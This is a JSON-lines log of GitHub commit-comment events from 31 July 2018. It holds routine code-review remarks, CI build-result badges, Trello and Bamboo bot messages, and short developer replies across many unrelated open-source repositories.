{"id":"8044516684","type":"CommitCommentEvent","actor":{"login":"helper-beep"},"repo":{"name":"helper-beep/Stockfish"},"payload":{"comment":{"id":29905370,"position":null,"line":null,"path":null,"commit_id":"2d4e7c99e612f1fb6406622d4c59de64a4567b1c","created_at":"2018-07-31T14:35:20Z","updated_at":"2018-07-31T14:35:20Z","author_association":"OWNER","body":"Change1 local a=4."}},"created_at":"2018-07-31T14:35:20Z"}
{"id":"8044517067","type":"CommitCommentEvent","actor":{"login":"jostnajonn09"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":29905371,"position":null,"line":null,"path":null,"commit_id":"d76389905c09a3d3362dcc37d62be31debd7f7df","created_at":"2018-07-31T14:35:23Z","updated_at":"2018-07-31T14:35:23Z","author_association":"NONE","body":"               -----"}},"created_at":"2018-07-31T14:35:23Z"}
{"id":"8044524908","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29905382,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-31T14:36:33Z","updated_at":"2018-07-31T14:36:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T14:36:33Z"}
{"id":"8044527757","type":"CommitCommentEvent","actor":{"login":"ericklombardo"},"repo":{"name":"ericklombardo/SqlBulkTools"},"payload":{"comment":{"id":29905387,"position":null,"line":null,"path":null,"commit_id":"44a065269142e2b4bcab28c6dbf789c47b940d7a","created_at":"2018-07-31T14:37:00Z","updated_at":"2018-07-31T14:37:00Z","author_association":"OWNER","body":"Hi,\r\n\r\nI upload the package to nuget as **SqlBulkToolsCore** but only the dotnet core version\r\n\r\n"}},"created_at":"2018-07-31T14:37:00Z"}
{"id":"8044528326","type":"CommitCommentEvent","actor":{"login":"dmed256"},"repo":{"name":"CEED/libCEED"},"payload":{"comment":{"id":29905389,"position":4,"line":52,"path":"backends/occa/ceed-occa.h","commit_id":"76bc9e576ff4d4ff2f7de5dc1351ce7ab78924a3","created_at":"2018-07-31T14:37:06Z","updated_at":"2018-07-31T14:37:06Z","author_association":"MEMBER","body":"@jeremylt I added this define to keep track of the count, feel free to rename it if the naming convention doesn't fit"}},"created_at":"2018-07-31T14:37:06Z"}
{"id":"8044531151","type":"CommitCommentEvent","actor":{"login":"dotcomboom"},"repo":{"name":"dotcomboom/AutoSite"},"payload":{"comment":{"id":29905396,"position":null,"line":null,"path":null,"commit_id":"d7264dd9c3692980f09f4d0c3817b171daa49d01","created_at":"2018-07-31T14:37:31Z","updated_at":"2018-07-31T14:37:31Z","author_association":"OWNER","body":"also make sure that the file has an extension to avoid directories trying to be loaded"}},"created_at":"2018-07-31T14:37:31Z"}
{"id":"8044532727","type":"CommitCommentEvent","actor":{"login":"papaya-dev"},"repo":{"name":"tenup-coin/TenUp"},"payload":{"comment":{"id":29905402,"position":null,"line":null,"path":null,"commit_id":"f4ced9a899fa5ce75553a99334765ecfc84db754","created_at":"2018-07-31T14:37:46Z","updated_at":"2018-07-31T14:37:46Z","author_association":"NONE","body":"What problems are you facing with the zerocoinv2 accumulators?"}},"created_at":"2018-07-31T14:37:46Z"}
{"id":"8044535894","type":"CommitCommentEvent","actor":{"login":"natali-zaitseva"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29905408,"position":6,"line":4,"path":"src/userDropdownLinksService.js","commit_id":"a944624d843933ebf0a562153e24f5cdd788e23c","created_at":"2018-07-31T14:38:15Z","updated_at":"2018-07-31T14:38:15Z","author_association":"NONE","body":"@zburke agree, changed"}},"created_at":"2018-07-31T14:38:15Z"}
{"id":"8044536575","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29905409,"position":5,"line":4,"path":"srcpkgs/etr/template","commit_id":"eb6f4f25bcf8e61d5ac49a05e8601494fb2217ab","created_at":"2018-07-31T14:38:20Z","updated_at":"2018-07-31T14:38:20Z","author_association":"MEMBER","body":"Uhm..no, you are right. I lost the actual split of the data subpackage and put the revbump in the wrong commit ;-P\r\nI'll add it as a separate commit."}},"created_at":"2018-07-31T14:38:20Z"}
{"id":"8044537334","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29905415,"position":25,"line":69,"path":"src/components/settingsNavigation/sortContacts.vue","commit_id":"119028715dcaab7b77c0f78bf443074e3186e350","created_at":"2018-07-31T14:38:27Z","updated_at":"2018-07-31T14:38:27Z","author_association":"COLLABORATOR","body":"Initial value should be set to the store orderKey\r\nAnd the store orderKey should be initiated on load of the app (beforeMount) on the Contacts.vue to the last order the user selected. You can use the localstorage for that. We uses this on the users management\r\n\r\nhttps://github.com/nextcloud/server/blob/master/settings/src/views/Users.vue#L190\r\nhttps://github.com/pinguinjkeke/vue-local-storage\r\n\r\nBasically the flow will be:\r\n**app init**: retrieve the localstorage (if any) and store it on the contacts orderKey store\r\n**on change**: set the new order of the localStorage and trigger a order change\r\n**default value**: always use the store getter getOrderKey\r\n"}},"created_at":"2018-07-31T14:38:27Z"}
{"id":"8044537346","type":"CommitCommentEvent","actor":{"login":"stackempty"},"repo":{"name":"stackempty/hashi-ui"},"payload":{"comment":{"id":29905416,"position":4,"line":27,"path":"frontend/src/containers/jobs.js","commit_id":"a8d31fc76bf7220e372ba85681b16d111822b911","created_at":"2018-07-31T14:38:27Z","updated_at":"2018-07-31T14:38:27Z","author_association":"OWNER","body":"Yeah. Better I guess. Will fix it."}},"created_at":"2018-07-31T14:38:27Z"}
{"id":"8044537714","type":"CommitCommentEvent","actor":{"login":"mtrootyy"},"repo":{"name":"w3c/html"},"payload":{"comment":{"id":29905417,"position":null,"line":null,"path":null,"commit_id":"c7f3e5e269b19c53a14dc8cfc599d993d48309c2","created_at":"2018-07-31T14:38:31Z","updated_at":"2018-07-31T14:38:31Z","author_association":"NONE","body":"`ping` attribute should be added not only to `<area>` element but also to `<a>` element."}},"created_at":"2018-07-31T14:38:31Z"}
{"id":"8044545143","type":"CommitCommentEvent","actor":{"login":"MorganSchmitz"},"repo":{"name":"CosmoStat/LambdaRCA"},"payload":{"comment":{"id":29905443,"position":4,"line":20,"path":"utilities/optim_utils.py","commit_id":"ec324a9e49b0f8a10e0c41cf14d0ab9d704d28cd","created_at":"2018-07-31T14:39:39Z","updated_at":"2018-07-31T14:39:39Z","author_association":"COLLABORATOR","body":"YES"}},"created_at":"2018-07-31T14:39:39Z"}
{"id":"8044548723","type":"CommitCommentEvent","actor":{"login":"alex-bely"},"repo":{"name":"alex-bely/VirtualWardrobe"},"payload":{"comment":{"id":29905454,"position":null,"line":null,"path":null,"commit_id":"2b60e15f66a52bf9f22b8e26746a9c2158da7bd9","created_at":"2018-07-31T14:40:14Z","updated_at":"2018-07-31T14:40:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Map DAL models to WebModels for data loading](https://trello.com/c/V122pzHl/15-map-dal-models-to-webmodels-for-data-loading)"}},"created_at":"2018-07-31T14:40:14Z"}
{"id":"8044554408","type":"CommitCommentEvent","actor":{"login":"musleh79"},"repo":{"name":"LilianYe/dual-simplex-method"},"payload":{"comment":{"id":29905461,"position":null,"line":null,"path":null,"commit_id":"81f01c97850eed3db051545dbc319ad1e6982288","created_at":"2018-07-31T14:41:01Z","updated_at":"2018-07-31T14:41:01Z","author_association":"NONE","body":"good evening Miss\r\nI am from Indonesia. I want to ask you a dual simplex algorithm. but when I change the parameters according to the parameters that I use, there is always an error. is there any error in entering the parameter?"}},"created_at":"2018-07-31T14:41:01Z"}
{"id":"8044554892","type":"CommitCommentEvent","actor":{"login":"alex-bely"},"repo":{"name":"alex-bely/VirtualWardrobe"},"payload":{"comment":{"id":29905462,"position":null,"line":null,"path":null,"commit_id":"aa0bf666e8f3c7c69a49e2d12fd256f9bbae9d8a","created_at":"2018-07-31T14:41:07Z","updated_at":"2018-07-31T14:41:07Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create Web models](https://trello.com/c/fex3vUrk/16-create-web-models)"}},"created_at":"2018-07-31T14:41:07Z"}
{"id":"8044555351","type":"CommitCommentEvent","actor":{"login":"brunchboy"},"repo":{"name":"brunchboy/dysentery"},"payload":{"comment":{"id":29905468,"position":null,"line":null,"path":null,"commit_id":"14b8d0575ddf991dc8fece33c5f8fe6c0217cb59","created_at":"2018-07-31T14:41:11Z","updated_at":"2018-07-31T14:41:11Z","author_association":"OWNER","body":"😆 You’re not wrong… although we would need a mixer that we could control as well to have any decent results. Maybe we could feed the CDJs into a sound card and use Ableton Live for that."}},"created_at":"2018-07-31T14:41:11Z"}
{"id":"8044557455","type":"CommitCommentEvent","actor":{"login":"wyattpaq14"},"repo":{"name":"JustAnotherChatClient/JaC2"},"payload":{"comment":{"id":29905479,"position":null,"line":null,"path":null,"commit_id":"871c0dba315ce859a479fa1d19de776ce5692538","created_at":"2018-07-31T14:41:30Z","updated_at":"2018-07-31T14:41:30Z","author_association":"CONTRIBUTOR","body":"removed"}},"created_at":"2018-07-31T14:41:30Z"}
{"id":"8044557597","type":"CommitCommentEvent","actor":{"login":"alex-bely"},"repo":{"name":"alex-bely/VirtualWardrobe"},"payload":{"comment":{"id":29905480,"position":null,"line":null,"path":null,"commit_id":"ed933fdf30ec35dda07a3f0656efdf9963361ec4","created_at":"2018-07-31T14:41:32Z","updated_at":"2018-07-31T14:41:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create separate Table for Images](https://trello.com/c/8Ei5GFwQ/8-create-separate-table-for-images)"}},"created_at":"2018-07-31T14:41:32Z"}
{"id":"8044558283","type":"CommitCommentEvent","actor":{"login":"alex-bely"},"repo":{"name":"alex-bely/VirtualWardrobe"},"payload":{"comment":{"id":29905483,"position":null,"line":null,"path":null,"commit_id":"72c6572bee3f90c6eade78ec4269e7c2f0aee2b7","created_at":"2018-07-31T14:41:38Z","updated_at":"2018-07-31T14:41:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create separate Table for Images](https://trello.com/c/8Ei5GFwQ/8-create-separate-table-for-images)"}},"created_at":"2018-07-31T14:41:38Z"}
{"id":"8044559224","type":"CommitCommentEvent","actor":{"login":"alex-bely"},"repo":{"name":"alex-bely/VirtualWardrobe"},"payload":{"comment":{"id":29905484,"position":null,"line":null,"path":null,"commit_id":"e56b76026db11eb175bffedb751070462d8874fd","created_at":"2018-07-31T14:41:46Z","updated_at":"2018-07-31T14:41:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create separate Table for Images](https://trello.com/c/8Ei5GFwQ/8-create-separate-table-for-images)"}},"created_at":"2018-07-31T14:41:46Z"}
{"id":"8044560636","type":"CommitCommentEvent","actor":{"login":"alex-bely"},"repo":{"name":"alex-bely/VirtualWardrobe"},"payload":{"comment":{"id":29905487,"position":null,"line":null,"path":null,"commit_id":"0c109d152bf0d75a0ed5b5c76ed03be0df5e47a3","created_at":"2018-07-31T14:41:59Z","updated_at":"2018-07-31T14:41:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add Display attribute to viewmodels](https://trello.com/c/6KzKBLFP/21-add-display-attribute-to-viewmodels)"}},"created_at":"2018-07-31T14:41:59Z"}
{"id":"8044563419","type":"CommitCommentEvent","actor":{"login":"geoff-smith"},"repo":{"name":"cms-ttH/ttH-13TeVMultiLeptons"},"payload":{"comment":{"id":29905497,"position":null,"line":null,"path":null,"commit_id":"5b9cd79c7c8abe43876a1300b62c5536864e3470","created_at":"2018-07-31T14:42:23Z","updated_at":"2018-07-31T14:42:23Z","author_association":"CONTRIBUTOR","body":"Untested!\r\n\r\n@Andrew42 : See what you think of this, and let me know if you spot anything obviously wrong. There is room for further optimization (for example, the size of `errormap` could probably be reduced by almost a factor of 2 through a bit of cleverness). Of course feel free to fix any style issues."}},"created_at":"2018-07-31T14:42:23Z"}
{"id":"8044566675","type":"CommitCommentEvent","actor":{"login":"maxice8"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29905504,"position":null,"line":null,"path":null,"commit_id":"96f3dcc84689d58b3b478a1d38cb1463c69c3ecd","created_at":"2018-07-31T14:42:52Z","updated_at":"2018-07-31T14:42:52Z","author_association":"MEMBER","body":"@Gottox that was the patch that was missing all this time "}},"created_at":"2018-07-31T14:42:52Z"}
{"id":"8044567851","type":"CommitCommentEvent","actor":{"login":"eviltrout"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29905506,"position":null,"line":null,"path":null,"commit_id":"ef78268c01edf92c7477166d3e7d4b071992b7b2","created_at":"2018-07-31T14:43:04Z","updated_at":"2018-07-31T14:43:04Z","author_association":"MEMBER","body":"This breaks the group-tracker plugin, as it has no `customFilter` property.\r\n\r\nYou need to adjust this code so that it works with existing code that does not have that property."}},"created_at":"2018-07-31T14:43:04Z"}
{"id":"8044572175","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905514,"position":34,"line":34,"path":"include/clang/Analysis/Analyses/Lifetime.h","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T14:43:43Z","updated_at":"2018-07-31T14:43:43Z","author_association":"NONE","body":"What the first `p` in `warnPpsetOfGlobal` stands for? Maybe it would be better to avoid the abbreviation here?\r\nAlso, what about taking a const ref to a Pset instead of the the string representation?"}},"created_at":"2018-07-31T14:43:43Z"}
{"id":"8044578969","type":"CommitCommentEvent","actor":{"login":"oxarbitrage"},"repo":{"name":"bitshares/bitshares-core"},"payload":{"comment":{"id":29905524,"position":42,"line":191,"path":"libraries/plugins/elasticsearch/elasticsearch_plugin.cpp","commit_id":"3604bed38b582780161a6f6edd7dafa0f5bf3203","created_at":"2018-07-31T14:44:45Z","updated_at":"2018-07-31T14:44:45Z","author_association":"NONE","body":"oops, this is upside down, fixing ..."}},"created_at":"2018-07-31T14:44:45Z"}
{"id":"8044584189","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29905538,"position":null,"line":null,"path":null,"commit_id":"16bfa0e843c29d6245631b4335f6e6ef0d47cc8d","created_at":"2018-07-31T14:45:31Z","updated_at":"2018-07-31T14:45:31Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-31T14:45:31Z"}
{"id":"8044592787","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905552,"position":78,"line":78,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T14:46:50Z","updated_at":"2018-07-31T14:46:50Z","author_association":"NONE","body":"I suspect this does not include the base classes. Is this intended?"}},"created_at":"2018-07-31T14:46:50Z"}
{"id":"8044594597","type":"CommitCommentEvent","actor":{"login":"talhasch"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29905560,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T14:47:07Z","updated_at":"2018-07-31T14:47:07Z","author_association":"CONTRIBUTOR","body":"last check commit pls"}},"created_at":"2018-07-31T14:47:07Z"}
{"id":"8044595899","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29905563,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T14:47:18Z","updated_at":"2018-07-31T14:47:18Z","author_association":"MEMBER","body":"Thanks for your explanation. Still I miss the need for the script (for ViX). Let me try to explain that:\r\nThe ViX build process ensures that all po-files on the feeds are up-to-date. So the only thing a translator should do, is to install the po-files on his box (e.g. 'opkg install enigma2-po' or 'opkg install enigma2-plugin-vix-core-po' or via the plugin browser of the box (once the context menu has been set to show po-files). If the translator sends his worked-on po-files (back) to GITHUB they will be taken into account during the next build, making sure all (new) translations are available.        \r\nAs far as I know (and as far as I have experienced myself) there is nothing missing or unhandy in this process. And there is absolutely no need to have a build process active at all.\r\n\r\n\r\nPS: Abu is the only one who brought in 'personal issues' in this thread; I have no idea why and how these might possibly be related with (the need for/use of) the script mentioned here."}},"created_at":"2018-07-31T14:47:18Z"}
{"id":"8044599177","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29905570,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-31T14:47:49Z","updated_at":"2018-07-31T14:47:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T14:47:49Z"}
{"id":"8044607221","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905592,"position":78,"line":78,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T14:49:00Z","updated_at":"2018-07-31T14:49:00Z","author_association":"NONE","body":"Minor optimization idea, though not sure if it would work: first look up the identifier info for name, and only do pointer comparisons afterwards."}},"created_at":"2018-07-31T14:49:00Z"}
{"id":"8044607514","type":"CommitCommentEvent","actor":{"login":"ale5000-git"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":29905593,"position":13,"line":252,"path":"modules/video_output/win32/direct3d11.c","commit_id":"0d6753dc907403e96db82e3d702a4633832be697","created_at":"2018-07-31T14:49:03Z","updated_at":"2018-07-31T14:49:03Z","author_association":"NONE","body":"@robUx4\r\nWhat about \"[Platform Update for Windows 7](https://docs.microsoft.com/en-us/windows/desktop/direct3darticles/platform-update-for-windows-7)\" that add support for Direct3D 11.1?"}},"created_at":"2018-07-31T14:49:03Z"}
{"id":"8044610223","type":"CommitCommentEvent","actor":{"login":"reipalacio"},"repo":{"name":"reipalacio/Vertex"},"payload":{"comment":{"id":29905605,"position":4,"line":4,"path":"README.md","commit_id":"e01b1e609b68b893beae101fd154bf212a513446","created_at":"2018-07-31T14:49:26Z","updated_at":"2018-07-31T14:49:26Z","author_association":"OWNER","body":"Cuando se ará"}},"created_at":"2018-07-31T14:49:26Z"}
{"id":"8044614747","type":"CommitCommentEvent","actor":{"login":"dreispt"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29905614,"position":null,"line":null,"path":null,"commit_id":"65ad60665e54a7e61d3d064df63457d0097587bd","created_at":"2018-07-31T14:50:07Z","updated_at":"2018-07-31T14:50:07Z","author_association":"CONTRIBUTOR","body":"When one line fix comes with 17 lines for non regression tests, that is real software engineering. :clap:"}},"created_at":"2018-07-31T14:50:07Z"}
{"id":"8044617804","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29905622,"position":null,"line":null,"path":null,"commit_id":"a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77","created_at":"2018-07-31T14:50:34Z","updated_at":"2018-07-31T14:50:34Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T14:50:34Z"}
{"id":"8044619648","type":"CommitCommentEvent","actor":{"login":"joseluis2g"},"repo":{"name":"Raggaer/bison"},"payload":{"comment":{"id":29905628,"position":null,"line":null,"path":null,"commit_id":"2115ba1b030a585b05b90feed6c3bb0cb4cbb2a9","created_at":"2018-07-31T14:50:49Z","updated_at":"2018-07-31T14:50:49Z","author_association":"NONE","body":":smiley:"}},"created_at":"2018-07-31T14:50:49Z"}
{"id":"8044619810","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905630,"position":102,"line":102,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T14:50:51Z","updated_at":"2018-07-31T14:50:51Z","author_association":"NONE","body":"I believe these two traversals of the methods could be merged into one."}},"created_at":"2018-07-31T14:50:51Z"}
{"id":"8044621273","type":"CommitCommentEvent","actor":{"login":"nekonomicon"},"repo":{"name":"FWGS/xash3d-deploy"},"payload":{"comment":{"id":29905637,"position":null,"line":null,"path":null,"commit_id":"64c50e8ffcdb752029e2a75363a0bbf9423a121b","created_at":"2018-07-31T14:51:04Z","updated_at":"2018-07-31T14:51:04Z","author_association":"MEMBER","body":"Use the latest release version.\r\nWe have plans to \"reload\" Xash3D FWGS in new repositorium using the latest original Xash3D 0.99 build 4097 as codebase.\r\nBranch 0.19.x really dead now.\r\nXash3D FWGS 0.20-beta not ready for android yet."}},"created_at":"2018-07-31T14:51:04Z"}
{"id":"8044624616","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29905645,"position":null,"line":null,"path":null,"commit_id":"fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282","created_at":"2018-07-31T14:51:34Z","updated_at":"2018-07-31T14:51:34Z","author_association":"NONE","body":"159433798-Report-correct-Zone-Infiltration-and-Zone-Ventilation-Volume-Flow-Rates (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2956 of 2956 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T14:51:34Z"}
{"id":"8044630485","type":"CommitCommentEvent","actor":{"login":"majekw"},"repo":{"name":"Optiboot/optiboot"},"payload":{"comment":{"id":29905658,"position":7,"line":34,"path":"optiboot/package_optiboot_optiboot-additional_index.json.TEMPLATE","commit_id":"565a9b6bbc11076e65a0b4b37321afe06ba6d5ca","created_at":"2018-07-31T14:52:24Z","updated_at":"2018-07-31T14:52:24Z","author_association":"CONTRIBUTOR","body":"Wouldn't be better to use optiboot-%VERSION%.zip naming scheme (with dash between optiboot and version) as in almost all projects around?"}},"created_at":"2018-07-31T14:52:24Z"}
{"id":"8044633414","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29905662,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T14:52:51Z","updated_at":"2018-07-31T14:52:51Z","author_association":"MEMBER","body":"Looks awesome! We are gradually moving to 2.0 ;)"}},"created_at":"2018-07-31T14:52:51Z"}
{"id":"8044634200","type":"CommitCommentEvent","actor":{"login":"greglever"},"repo":{"name":"genomicsengland/GelReportModels"},"payload":{"comment":{"id":29905665,"position":null,"line":null,"path":null,"commit_id":"bbece6a57f1ff302bea942385a27737794bf6468","created_at":"2018-07-31T14:52:57Z","updated_at":"2018-07-31T14:52:57Z","author_association":"COLLABORATOR","body":"@Antonior26 @priesgo can you please review when you get a chance"}},"created_at":"2018-07-31T14:52:57Z"}
{"id":"8044634729","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905666,"position":123,"line":123,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T14:53:02Z","updated_at":"2018-07-31T14:53:02Z","author_association":"NONE","body":"What about `Decl::isInStdNamespace`? That also handles more cases like inline namespaces."}},"created_at":"2018-07-31T14:53:02Z"}
{"id":"8044637707","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29905673,"position":null,"line":null,"path":null,"commit_id":"65ad60665e54a7e61d3d064df63457d0097587bd","created_at":"2018-07-31T14:53:28Z","updated_at":"2018-07-31T14:53:28Z","author_association":"CONTRIBUTOR","body":"Yes, very well done!"}},"created_at":"2018-07-31T14:53:28Z"}
{"id":"8044639344","type":"CommitCommentEvent","actor":{"login":"acjh"},"repo":{"name":"aspnetboilerplate/aspnetboilerplate"},"payload":{"comment":{"id":29905675,"position":null,"line":null,"path":null,"commit_id":"59237945c7b75cedcaf8be5467de78b5116ae75a","created_at":"2018-07-31T14:53:41Z","updated_at":"2018-07-31T14:53:41Z","author_association":"CONTRIBUTOR","body":"https://aspnetboilerplate.com/Pages/Documents/Plugin"}},"created_at":"2018-07-31T14:53:41Z"}
{"id":"8044639477","type":"CommitCommentEvent","actor":{"login":"Yasir-siddiqui"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29905676,"position":null,"line":null,"path":null,"commit_id":"61b526548080b03fe2ce5ed76912394411149470","created_at":"2018-07-31T14:53:42Z","updated_at":"2018-07-31T14:53:42Z","author_association":"NONE","body":"....."}},"created_at":"2018-07-31T14:53:42Z"}
{"id":"8044640227","type":"CommitCommentEvent","actor":{"login":"Yasir-siddiqui"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29905680,"position":null,"line":null,"path":null,"commit_id":"61b526548080b03fe2ce5ed76912394411149470","created_at":"2018-07-31T14:53:49Z","updated_at":"2018-07-31T14:53:49Z","author_association":"NONE","body":"Reply kar"}},"created_at":"2018-07-31T14:53:49Z"}
{"id":"8044640832","type":"CommitCommentEvent","actor":{"login":"euspectre"},"repo":{"name":"linux-test-project/ltp"},"payload":{"comment":{"id":29905684,"position":null,"line":null,"path":null,"commit_id":"3c87ef2961dedb10d1f674c6a530e00dbab8ec1b","created_at":"2018-07-31T14:53:55Z","updated_at":"2018-07-31T14:53:55Z","author_association":"NONE","body":"Thanks for fixing this!\r\n\r\nLooks like it is need to remove checking for SGID from \"syscalls.mknod03\" as well (https://github.com/linux-test-project/ltp/blob/master/testcases/kernel/syscalls/mknod/mknod03.c#L145). That test creates a FIFO in a directory with SGID and expects the FIFO to have SGID as well, which is not always the case."}},"created_at":"2018-07-31T14:53:55Z"}
